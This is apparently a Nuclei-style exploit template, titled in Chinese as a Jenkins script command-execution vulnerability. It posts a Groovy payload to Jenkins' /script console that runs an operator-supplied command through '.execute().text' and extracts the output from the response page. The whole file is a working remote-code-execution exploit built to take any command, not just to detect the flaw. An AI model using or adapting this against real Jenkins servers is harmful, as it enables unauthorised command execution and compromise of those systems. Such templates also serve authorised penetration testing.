id: jenkins-script-exp

info:
  name: jenkins script命令执行漏洞
  author: white
  severity: critical

variables:
  exp: "{{exp}}"

requests:
  - raw:
      - |
        POST /script HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Language: en
        Content-Type: application/x-www-form-urlencoded

        Submit=Run&script=println '{{exp}}'.execute().text
    extractors:
      - type: xpath
        part: body
        xpath:
          - '//*[@id="main-panel"]/pre[2]/text()'
